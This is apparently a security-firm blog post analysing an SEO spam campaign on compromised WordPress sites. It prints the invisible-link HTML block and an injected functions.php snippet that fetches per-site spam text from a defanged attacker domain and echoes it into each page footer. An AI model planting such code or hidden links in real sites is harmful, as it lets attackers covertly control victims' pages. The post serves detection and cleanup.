Lately, we’ve seen quite a few sites with injected spammy links that follow this format:
<div style="position: absolute; opacity: 0.001; z-index: 10; filter: alpha(opacity=0);">
<a href="https://www.shoesfindoutlet[.]co/">www.shoesfindoutlet[.]co</a>
<a href="https://www.stepperbest[.]com/">stepper motor</a>
</div>
The spammy domains may change from time to time but the entire format — and trick to make the content invisible — remains the same.
When we clean infected WordPress sites related to this campaign, we find malicious code similar to the following snippet injected into the active theme’s function.php file.
<?php
function add_my_custom_script(){
$url_current = "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
?>
<?php
$url5 = "https://<compromised-site>/";
if($url_current == $url5){
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site1>.txt');
echo $file;
?>
<?php
}
else
{
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site>.txt');
echo $file;
}
?>
<?php
}
add_action('wp_footer', 'add_my_custom_script');
The block with spammy links is fetched from the remote shoesinfy[.]com site, allowing attackers to modify the injected code without accessing the site.
Moreover, each compromised site has its own text file with links on shoesinfy[.]com (found as shoesinfy[.]com/domain.tld1.txt). This text file allows bad actors to customize their spam injections across different compromised sites.